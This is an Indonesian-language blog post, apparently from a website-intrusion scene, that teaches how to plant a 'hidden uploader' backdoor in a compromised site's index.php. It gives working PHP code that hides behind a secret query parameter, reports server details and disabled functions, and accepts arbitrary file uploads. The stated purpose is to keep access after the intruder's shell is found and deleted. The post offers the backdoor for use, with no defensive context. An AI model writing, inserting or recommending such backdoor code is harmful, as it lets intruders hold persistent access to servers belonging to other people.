Selamat wayah gini, salam dari saya admin baru disini, nama saya 'sayang' jadi kalo kalian manggil saya panggil sayang aja ya :)
ini post pertama saya tentang cara memasang hidden uploader
Q: apa itu hidden uploader?
A: hidden uploader itu uploader yang di sembunyikan
Q: untuk upload apa?
A: upload foto titit lu
jadi kalo udah masuk shell terus takut shell nya ilang di tikung orang atau di hapus yang punya nya bisa pasang hidden uploader ini, pasang dimana aja yang menurut kalian tersembunyi dan tentu nya di file extensi .php
kalo saran saya pasang di index.php aja di paling bawah atau paling atas (dibawah "<?php")
bisa pasang script ini
if(isset($_GET["kampret"]))
{
echo"<font color=#000000>".php_uname()."";
print "\n";$disable_functions = @ini_get("disable_functions");
echo "<br>DisablePHP=".$disable_functions; print "\n";
echo"<br><form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=k type=submit id=k value=pencet><br>";
if($_POST["k"]==pencet)
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>".$_FILES["f"]["name"];
}else{
echo"<b>Gagal upload kampret";
}
}
}
jadi nanti code jadi nya seperti ini
<?php
if(isset($_GET["kampret"]))
{
echo"<font color=#000000>".php_uname()."";
print "\n";$disable_functions = @ini_get("disable_functions");
echo "<br>DisablePHP=".$disable_functions; print "\n";
echo"<br><form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=k type=submit id=k value=pencet><br>";
if($_POST["k"]==pencet)
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>".$_FILES["f"]["name"];
}else{
echo"<b>Gagal upload kampret";
}
}
}
hasilnya seperti ini
script yang lainnya jangan di hapus ya, kan cuma menambahkan script di atas aja, jadi kalo shell kalian hilang, kalian tinggal panggil aja site.com/index.php?kampret nanti akan muncul uploader :D
simple kan? silahkan dicoba
Emoticon Emoticon